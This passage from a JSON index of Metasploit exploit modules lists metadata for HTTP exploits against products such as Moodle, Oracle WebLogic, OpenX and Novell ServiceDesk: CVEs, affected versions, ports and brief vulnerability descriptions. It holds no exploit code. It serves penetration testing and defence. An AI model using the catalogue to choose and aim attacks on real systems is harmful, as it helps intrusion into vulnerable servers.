"Unix",
"Windows"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/metasploit_webui_console_command_execution.rb",
"is_install_path": true,
"ref_name": "multi/http/metasploit_webui_console_command_execution",
"check": false,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/mma_backdoor_upload": {
"name": "Th3 MMA mma.php Backdoor Arbitrary File Upload",
"full_name": "exploit/multi/http/mma_backdoor_upload",
"rank": 600,
"disclosure_date": "2012-04-02",
"type": "exploit",
"author": [
"Jay Turla <@shipcod3>"
],
"description": "This module exploits Th3 MMA mma.php Backdoor which allows an arbitrary file upload that\n leads to arbitrary code execution. This backdoor also echoes the Linux kernel version or\n operating system version because of the php_uname() function.",
"references": [
"URL-http://blog.pages.kr/1307"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"mma file uploader"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/mma_backdoor_upload.rb",
"is_install_path": true,
"ref_name": "multi/http/mma_backdoor_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/mobilecartly_upload_exec": {
"name": "MobileCartly 1.0 Arbitrary File Creation Vulnerability",
"full_name": "exploit/multi/http/mobilecartly_upload_exec",
"rank": 600,
"disclosure_date": "2012-08-10",
"type": "exploit",
"author": [
"Yakir Wizman <yakir.wizman@gmail.com>",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability in MobileCartly. The savepage.php file\n does not do any permission checks before using file_put_contents(), which\n allows any user to have direct control of that function to create files\n under the 'pages' directory by default, or anywhere else as long as the user\n has WRITE permission.",
"references": [
"OSVDB-85509",
"EDB-20422",
"BID-55399"
],
"platform": "Linux,PHP",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Generic (PHP Payload)",
"Linux x86"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/mobilecartly_upload_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/mobilecartly_upload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/monstra_fileupload_exec": {
"name": "Monstra CMS Authenticated Arbitrary File Upload",
"full_name": "exploit/multi/http/monstra_fileupload_exec",
"rank": 600,
"disclosure_date": "2017-12-18",
"type": "exploit",
"author": [
"Ishaq Mohammed <shaikhishaq201@gmail.com>",
"Touhid M.Shaikh <touhidshaikh22@gmail.com>"
],
"description": "MonstraCMS 3.0.4 allows users to upload arbitrary files, which leads to remote command execution on the remote server.\n An attacker may choose to upload a file containing PHP code and run this code by accessing the resulting PHP file.\n This module was tested against MonstraCMS 3.0.4.",
"references": [
"CVE-2017-18048",
"EDB-43348",
"URL-https://blogs.securiteam.com/index.php/archives/3559",
"URL-https://securityprince.blogspot.com/2017/12/monstra-cms-304-arbitrary-file-upload.html?m=1",
"URL-https://www.youtube.com/watch?v=-ziZ6DELbzw"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Monstra CMS 3.0.4"
],
"mod_time": "2018-07-10 14:13:57 +0000",
"path": "/modules/exploits/multi/http/monstra_fileupload_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/monstra_fileupload_exec",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/moodle_cmd_exec": {
"name": "Moodle Remote Command Execution",
"full_name": "exploit/multi/http/moodle_cmd_exec",
"rank": 400,
"disclosure_date": "2013-10-30",
"type": "exploit",
"author": [
"Brandon Perry <bperry.volatile@gmail.com>"
],
"description": "Moodle allows an authenticated user to define spellcheck settings via the web interface.\n The user can update the spellcheck mechanism to point to a system-installed aspell binary.\n By updating the path for the spellchecker to an arbitrary command, an attacker can run\n arbitrary commands in the context of the web application upon spellchecking requests.\n\n This module also allows an attacker to leverage another privilege escalation vuln.\n Using the referenced XSS vuln, an unprivileged authenticated user can steal an admin sesskey\n and use this to escalate privileges to that of an admin, allowing the module to pop a shell\n as a previously unprivileged authenticated user.\n\n This module was tested against Moodle version 2.5.2 and 2.2.3.",
"references": [
"CVE-2013-3630",
"EDB-28174",
"URL-https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/moodle_cmd_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/moodle_cmd_exec",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/movabletype_upgrade_exec": {
"name": "Movable Type 4.2x, 4.3x Web Upgrade Remote Code Execution",
"full_name": "exploit/multi/http/movabletype_upgrade_exec",
"rank": 600,
"disclosure_date": "2013-01-07",
"type": "exploit",
"author": [
"Kacper Nowak",
"Nick Blundell",
"Gary O'Leary-Steele"
],
"description": "This module can be used to execute a payload on Movable Type (MT) that\n exposes a CGI script, mt-upgrade.cgi (usually at /mt/mt-upgrade.cgi),\n that is used during installation and updating of the platform.\n The vulnerability arises due to the following properties:\n 1. This script may be invoked remotely without requiring authentication\n to any MT instance.\n 2. Through a crafted POST request, it is possible to invoke particular\n database migration functions (i.e. functions that bring the existing\n database up-to-date with an updated codebase) by name and with\n particular parameters.\n 3. A particular migration function, core_drop_meta_for_table, allows\n a class parameter to be set which is used directly in a perl eval\n statement, allowing perl code injection.",
"references": [
"CVE-2012-6315",
"CVE-2013-0209",
"OSVDB-89322",
"URL-http://www.sec-1.com/blog/?p=402",
"URL-http://www.movabletype.org/2013/01/movable_type_438_patch.html"
],
"platform": "Unix,Windows",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Movable Type 4.2x, 4.3x"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/multi/http/movabletype_upgrade_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/movabletype_upgrade_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/mutiny_subnetmask_exec": {
"name": "Mutiny Remote Command Execution",
"full_name": "exploit/multi/http/mutiny_subnetmask_exec",
"rank": 600,
"disclosure_date": "2012-10-22",
"type": "exploit",
"author": [
"Christopher Campbell",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits an authenticated command injection vulnerability in the\n Mutiny appliance. Versions prior to 4.5-1.12 are vulnerable. In order to exploit\n the vulnerability the mutiny user must have access to the admin interface. The\n injected commands are executed with root privileges. This module has been tested\n successfully on Mutiny 4.2-1.05.",
"references": [
"CVE-2012-3001",
"OSVDB-86570",
"BID-56165",
"US-CERT-VU-841851",
"URL-http://obscuresecurity.blogspot.com.es/2012/10/mutiny-command-injection-and-cve-2012.html"
],
"platform": "Linux,Unix",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Unix CMD",
"Linux Payload"
],
"mod_time": "2018-12-11 10:16:16 +0000",
"path": "/modules/exploits/multi/http/mutiny_subnetmask_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/mutiny_subnetmask_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/nas4free_php_exec": {
"name": "NAS4Free Arbitrary Remote Code Execution",
"full_name": "exploit/multi/http/nas4free_php_exec",
"rank": 500,
"disclosure_date": "2013-10-30",
"type": "exploit",
"author": [
"Brandon Perry <bperry.volatile@gmail.com>"
],
"description": "NAS4Free allows an authenticated user to post PHP code to a special HTTP script and have\n the code executed remotely. This module was successfully tested against NAS4Free version\n 9.1.0.1.804. Earlier builds are likely to be vulnerable as well.",
"references": [
"CVE-2013-3631",
"URL-https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Target"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/nas4free_php_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/nas4free_php_exec",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/navigate_cms_rce": {
"name": "Navigate CMS Unauthenticated Remote Code Execution",
"full_name": "exploit/multi/http/navigate_cms_rce",
"rank": 600,
"disclosure_date": "2018-09-26",
"type": "exploit",
"author": [
"Pyriphlegethon"
],
"description": "This module exploits insufficient sanitization in the database::protect\n method, of Navigate CMS versions 2.8 and prior, to bypass authentication.\n\n The module then uses a path traversal vulnerability in navigate_upload.php\n that allows authenticated users to upload PHP files to arbitrary locations.\n Together these vulnerabilities allow an unauthenticated attacker to\n execute arbitrary PHP code remotely.\n\n This module was tested against Navigate CMS 2.8.",
"references": [
"CVE-2018-17552",
"CVE-2018-17553"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2018-10-02 06:57:04 +0000",
"path": "/modules/exploits/multi/http/navigate_cms_rce.rb",
"is_install_path": true,
"ref_name": "multi/http/navigate_cms_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/netwin_surgeftp_exec": {
"name": "Netwin SurgeFTP Remote Command Execution",
"full_name": "exploit/multi/http/netwin_surgeftp_exec",
"rank": 400,
"disclosure_date": "2012-12-06",
"type": "exploit",
"author": [
"Spencer McIntyre",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in Netwin SurgeFTP, version 23c8\n or prior. Note that in order to execute commands via the FTP service,\n you must have valid credentials for the web-based administrative console.",
"references": [
"OSVDB-89105",
"EDB-23522"
],
"platform": "Unix,Windows",
"arch": "",
"rport": 7021,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"Windows",
"Unix"
],
"mod_time": "2018-10-27 20:54:14 +0000",
"path": "/modules/exploits/multi/http/netwin_surgeftp_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/netwin_surgeftp_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
"Stability": [
"crash-safe"
],
"SideEffects": [
"artifacts-on-disk",
"ioc-in-logs"
],
"Reliability": [
"repeatable-session"
]
}
},
"exploit_multi/http/nibbleblog_file_upload": {
"name": "Nibbleblog File Upload Vulnerability",
"full_name": "exploit/multi/http/nibbleblog_file_upload",
"rank": 600,
"disclosure_date": "2015-09-01",
"type": "exploit",
"author": [
"Unknown",
"Roberto Soares Espreto <robertoespreto@gmail.com>"
],
"description": "Nibbleblog contains a flaw that allows an authenticated remote\n attacker to execute arbitrary PHP code. This module was\n tested on version 4.0.3.",
"references": [
"CVE-2015-6967",
"URL-http://blog.curesec.com/article/blog/NibbleBlog-403-Code-Execution-47.html"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Nibbleblog 4.0.3"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/multi/http/nibbleblog_file_upload.rb",
"is_install_path": true,
"ref_name": "multi/http/nibbleblog_file_upload",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/novell_servicedesk_rce": {
"name": "Novell ServiceDesk Authenticated File Upload",
"full_name": "exploit/multi/http/novell_servicedesk_rce",
"rank": 600,
"disclosure_date": "2016-03-30",
"type": "exploit",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module exploits an authenticated arbitrary file upload via directory traversal\n to execute code on the target. It has been tested on versions 6.5 and 7.1.0, in\n Windows and Linux installations of Novell ServiceDesk, as well as the Virtual\n Appliance provided by Novell.",
"references": [
"CVE-2016-1593",
"URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/novell-service-desk-7.1.0.txt",
"URL-https://seclists.org/bugtraq/2016/Apr/64"
],
"platform": "Linux,Windows",
"arch": "x86",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"Novell ServiceDesk / Linux",
"Novell ServiceDesk / Windows"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/multi/http/novell_servicedesk_rce.rb",
"is_install_path": true,
"ref_name": "multi/http/novell_servicedesk_rce",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/nuuo_nvrmini_upgrade_rce": {
"name": "NUUO NVRmini upgrade_handle.php Remote Command Execution",
"full_name": "exploit/multi/http/nuuo_nvrmini_upgrade_rce",
"rank": 600,
"disclosure_date": "2018-08-04",
"type": "exploit",
"author": [
"Berk Dusunur",
"numan turle"
],
"description": "This module exploits a vulnerability in the web application of the NUUO NVRmini IP camera\n by triggering the writeuploaddir command in the upgrade_handle.php file.",
"references": [
"URL-https://www.berkdusunur.net/2018/11/development-of-metasploit-module-after.html",
"URL-https://www.tenable.com/security/research/tra-2018-41",
"CVE-2018-14933",
"EDB-45070"
],
"platform": "Linux,Unix,Windows",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"NUUO NVRmini"
],
"mod_time": "2019-02-06 22:26:31 +0000",
"path": "/modules/exploits/multi/http/nuuo_nvrmini_upgrade_rce.rb",
"is_install_path": true,
"ref_name": "multi/http/nuuo_nvrmini_upgrade_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/op5_license": {
"name": "OP5 license.php Remote Command Execution",
"full_name": "exploit/multi/http/op5_license",
"rank": 600,
"disclosure_date": "2012-01-05",
"type": "exploit",
"author": [
"Peter Osterberg <j@vel.nu>"
],
"description": "This module exploits an arbitrary root command execution vulnerability in the\n OP5 Monitor license.php. Ekelow has confirmed that OP5 Monitor versions 5.3.5,\n 5.4.0, 5.4.2, 5.5.0, 5.5.1 are vulnerable.",
"references": [
"CVE-2012-0261",
"OSVDB-78064",
"URL-http://secunia.com/advisories/47417/"
],
"platform": "Unix",
"arch": "cmd",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/op5_license.rb",
"is_install_path": true,
"ref_name": "multi/http/op5_license",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/op5_welcome": {
"name": "OP5 welcome Remote Command Execution",
"full_name": "exploit/multi/http/op5_welcome",
"rank": 600,
"disclosure_date": "2012-01-05",
"type": "exploit",
"author": [
"Peter Osterberg <j@vel.nu>"
],
"description": "This module exploits an arbitrary root command execution vulnerability in\n OP5 Monitor welcome. Ekelow AB has confirmed that OP5 Monitor versions 5.3.5,\n 5.4.0, 5.4.2, 5.5.0, 5.5.1 are vulnerable.",
"references": [
"CVE-2012-0262",
"OSVDB-78065",
"URL-http://secunia.com/advisories/47417/"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/op5_welcome.rb",
"is_install_path": true,
"ref_name": "multi/http/op5_welcome",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/openfire_auth_bypass": {
"name": "Openfire Admin Console Authentication Bypass",
"full_name": "exploit/multi/http/openfire_auth_bypass",
"rank": 600,
"disclosure_date": "2008-11-10",
"type": "exploit",
"author": [
"Andreas Kurtz",
"h0ng10"
],
"description": "This module exploits an authentication bypass vulnerability in the administration\n console of Openfire servers. By using this vulnerability it is possible to\n upload/execute a malicious Openfire plugin on the server and execute arbitrary Java\n code. This module has been tested against Openfire 3.6.0a.\n\n It is possible to remove the uploaded plugin after execution, however this might leave\n the server in an unstable state, making re-exploitation difficult. You might\n want to do this manually.",
"references": [
"CVE-2008-6508",
"OSVDB-49663",
"BID-32189",
"EDB-7075",
"URL-http://community.igniterealtime.org/thread/35874"
],
"platform": "Java,Linux,Windows",
"arch": "",
"rport": 9090,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Java Universal",
"Windows x86 (Native Payload)",
"Linux x86 (Native Payload)"
],
"mod_time": "2018-08-20 15:43:07 +0000",
"path": "/modules/exploits/multi/http/openfire_auth_bypass.rb",
"is_install_path": true,
"ref_name": "multi/http/openfire_auth_bypass",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/openmediavault_cmd_exec": {
"name": "OpenMediaVault Cron Remote Command Execution",
"full_name": "exploit/multi/http/openmediavault_cmd_exec",
"rank": 600,
"disclosure_date": "2013-10-30",
"type": "exploit",
"author": [
"Brandon Perry <bperry.volatile@gmail.com>"
],
"description": "OpenMediaVault allows an authenticated user to create cron jobs as arbitrary users on the system.\n An attacker can abuse this to run arbitrary commands as any user available on the system (including root).",
"references": [
"CVE-2013-3632",
"URL-https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/multi/http/openmediavault_cmd_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/openmediavault_cmd_exec",
"check": false,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/openx_backdoor_php": {
"name": "OpenX Backdoor PHP Code Execution",
"full_name": "exploit/multi/http/openx_backdoor_php",
"rank": 600,
"disclosure_date": "2013-08-07",
"type": "exploit",
"author": [
"egypt <egypt@metasploit.com>",
"Unknown"
],
"description": "OpenX Ad Server version 2.8.10 was shipped with an obfuscated\n backdoor since at least November 2012 through August 2013.\n Exploitation is simple, requiring only a single request with a\n rot13'd and reversed payload.",
"references": [
"CVE-2013-4211",
"OSVDB-96073",
"URL-http://www.heise.de/security/meldung/Achtung-Anzeigen-Server-OpenX-enthaelt-eine-Hintertuer-1929769.html",
"URL-http://forum.openx.org/index.php?showtopic=503521628"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Generic (PHP payload)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/openx_backdoor_php.rb",
"is_install_path": true,
"ref_name": "multi/http/openx_backdoor_php",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/opmanager_socialit_file_upload": {
"name": "ManageEngine OpManager and Social IT Arbitrary File Upload",
"full_name": "exploit/multi/http/opmanager_socialit_file_upload",
"rank": 600,
"disclosure_date": "2014-09-27",
"type": "exploit",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module exploits a file upload vulnerability in ManageEngine OpManager and Social IT.\n The vulnerability exists in the FileCollector servlet which accepts unauthenticated\n file uploads. This module has been tested successfully on OpManager v8.8 - v11.3 and on\n version 11.0 of SocialIT for Windows and Linux.",
"references": [
"CVE-2014-6034",
"OSVDB-112276",
"URL-https://seclists.org/fulldisclosure/2014/Sep/110"
],
"platform": "Java",
"arch": "java",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"OpManager v8.8 - v11.3 / Social IT Plus 11.0 Java Universal"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/multi/http/opmanager_socialit_file_upload.rb",
"is_install_path": true,
"ref_name": "multi/http/opmanager_socialit_file_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/oracle_ats_file_upload": {
"name": "Oracle ATS Arbitrary File Upload",
"full_name": "exploit/multi/http/oracle_ats_file_upload",
"rank": 600,
"disclosure_date": "2016-01-20",
"type": "exploit",
"author": [
"Zhou Yu",
"wvu <wvu@metasploit.com>"
],
"description": "This module exploits an authentication bypass and arbitrary file upload\n in Oracle Application Testing Suite (OATS), version 12.4.0.2.0 and\n unknown earlier versions, to upload and execute a JSP shell.",
"references": [
"CVE-2016-0492",
"CVE-2016-0491",
"EDB-39691"
],
"platform": "Linux,Windows",
"arch": "java",
"rport": 8088,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"OATS <= 12.4.0.2.0 (Windows)",
"OATS <= 12.4.0.2.0 (Linux)"
],
"mod_time": "2019-02-25 11:35:34 +0000",
"path": "/modules/exploits/multi/http/oracle_ats_file_upload.rb",
"is_install_path": true,
"ref_name": "multi/http/oracle_ats_file_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/oracle_reports_rce": {
"name": "Oracle Forms and Reports Remote Code Execution",
"full_name": "exploit/multi/http/oracle_reports_rce",
"rank": 500,
"disclosure_date": "2014-01-15",
"type": "exploit",
"author": [
"miss_sudo <security@netinfiltration.com>",
"Mekanismen <mattias@gotroot.eu>"
],
"description": "This module uses two vulnerabilities in Oracle Forms and Reports to get remote code execution\n on the host. The showenv url can be used to disclose information about a server. A second\n vulnerability that allows arbitrary reading and writing to the host filesystem can then be\n used to write a shell from a remote url to a known local path disclosed from the previous\n vulnerability.\n\n The local path being accessible from an URL allows an attacker to perform the remote code\n execution using, for example, a .jsp shell.\n\n This module was tested successfully on Windows and Oracle Forms and Reports 10.1.",
"references": [
"CVE-2012-3152",
"CVE-2012-3153",
"OSVDB-86395",
"OSVDB-86394",
"EDB-31253"
],
"platform": "Linux,Windows",
"arch": "",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Linux",
"Windows"
],
"mod_time": "2017-08-28 20:17:58 +0000",
"path": "/modules/exploits/multi/http/oracle_reports_rce.rb",
"is_install_path": true,
"ref_name": "multi/http/oracle_reports_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/oracle_weblogic_wsat_deserialization_rce": {
"name": "Oracle WebLogic wls-wsat Component Deserialization RCE",
"full_name": "exploit/multi/http/oracle_weblogic_wsat_deserialization_rce",
"rank": 600,
"disclosure_date": "2017-10-19",
"type": "exploit",
"author": [
"Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>",
"Luffin",
"Alexey Tyurin",
"Federico Dotta"
],
"description": "The Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization\n remote code execution vulnerability. Supported versions that are affected are\n 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Discovered by Alexey Tyurin\n of ERPScan and Federico Dotta of Media Service. Please note that SRVHOST, SRVPORT,\n HTTP_DELAY, URIPATH and related HTTP Server variables are only used when executing a check\n and will not be used when executing the exploit itself.",
"references": [
"URL-https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html",
"URL-https://github.com/Luffin/CVE-2017-10271",
"URL-https://github.com/kkirsche/CVE-2017-10271",
"CVE-2017-10271",
"EDB-43458"
],
"platform": "Unix,Windows",
"arch": "cmd",
"rport": 7001,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Windows Command payload",
"Unix Command payload"
],
"mod_time": "2018-01-18 13:26:44 +0000",
"path": "/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb",
"is_install_path": true,
"ref_name": "multi/http/oracle_weblogic_wsat_deserialization_rce",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/orientdb_exec": {
"name": "OrientDB 2.2.x Remote Code Execution",
"full_name": "exploit/multi/http/orientdb_exec",
"rank": 400,
"disclosure_date": "2017-07-13",
"type": "exploit",
"author": [
"Francis Alexander - Beyond Security's SecuriTeam Secure Disclosure program",
"Ricardo Jorge Borges de Almeida ricardojba1 <Ricardo Jorge Borges de Almeida ricardojba1@gmail.com>"
],
"description": "This module leverages a privilege escalation on OrientDB to execute unsandboxed OS commands.\n All versions from 2.2.2 up to 2.2.22 should be vulnerable.",
"references": [
"CVE-2017-11467",
"URL-https://blogs.securiteam.com/index.php/archives/3318",
"URL-http://www.palada.net/index.php/2017/07/13/news-2112/",
"URL-https://github.com/orientechnologies/orientdb/wiki/OrientDB-2.2-Release-Notes#2223---july-11-2017"
],
"platform": "Linux,Unix,Windows",
"arch": "",
"rport": 2480,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Linux",
"Unix CMD",
"Windows"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/multi/http/orientdb_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/orientdb_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/oscommerce_installer_unauth_code_exec": {
"name": "osCommerce Installer Unauthenticated Code Execution",
"full_name": "exploit/multi/http/oscommerce_installer_unauth_code_exec",
"rank": 600,
"disclosure_date": "2018-04-30",
"type": "exploit",
"author": [
"Simon Scannell",
"Daniel Teixeira"
],
"description": "If the /install/ directory was not removed, it is possible for an unauthenticated\n attacker to run the \"install_4.php\" script, which will create the configuration\n file for the installation. This allows the attacker to inject PHP code into the\n configuration file and execute it.",
"references": [
"EDB-44374"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"osCommerce 2.3.4.1"
],
"mod_time": "2018-06-26 08:21:10 +0000",
"path": "/modules/exploits/multi/http/oscommerce_installer_unauth_code_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/oscommerce_installer_unauth_code_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/pandora_upload_exec": {
"name": "Pandora FMS v3.1 Auth Bypass and Arbitrary File Upload Vulnerability",
"full_name": "exploit/multi/http/pandora_upload_exec",
"rank": 600,
"disclosure_date": "2010-11-30",
"type": "exploit",
"author": [
"Juan Galiana Lara",
"Raymond Nunez <rcnunez@upd.edu.ph>",
"Elizabeth Loyola <ecloyola@upd.edu.ph>",
"Fr330wn4g3 <Fr330wn4g3@gmail.com>",
"_flood <freshbones@gmail.com>",
"mubix <mubix@room362.com>",
"egypt <egypt@metasploit.com>"
],
"description": "This module exploits an authentication bypass vulnerability in Pandora FMS v3.1 as\n disclosed by Juan Galiana Lara. It also integrates with the built-in pandora\n upload which allows a user to upload arbitrary files to the '/images/' directory.\n\n This module was created as an exercise in the Metasploit Mastery Class at Blackhat\n that was facilitated by egypt and mubix.",
"references": [
"CVE-2010-4279",
"OSVDB-69549",
"BID-45112"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic Targeting"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/pandora_upload_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/pandora_upload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/phoenix_exec": {
"name": "Phoenix Exploit Kit Remote Code Execution",
"full_name": "exploit/multi/http/phoenix_exec",
"rank": 600,
"disclosure_date": "2016-07-01",
"type": "exploit",
"author": [
"CrashBandicot",
"Jay Turla"
],
"description": "This module exploits a Remote Code Execution in the web panel of Phoenix Exploit Kit via geoip.php. The\n Phoenix Exploit Kit is a popular commercial crimeware tool that probes the browser of the visitor for the\n presence of outdated and insecure versions of browser plugins like Java and Adobe Flash and Reader,\n silently installing malware if found.",
"references": [
"EDB-40047",
"URL-http://krebsonsecurity.com/tag/phoenix-exploit-kit/",
"URL-https://www.pwnmalw.re/Exploit%20Pack/phoenix"
],
"platform": "PHP",
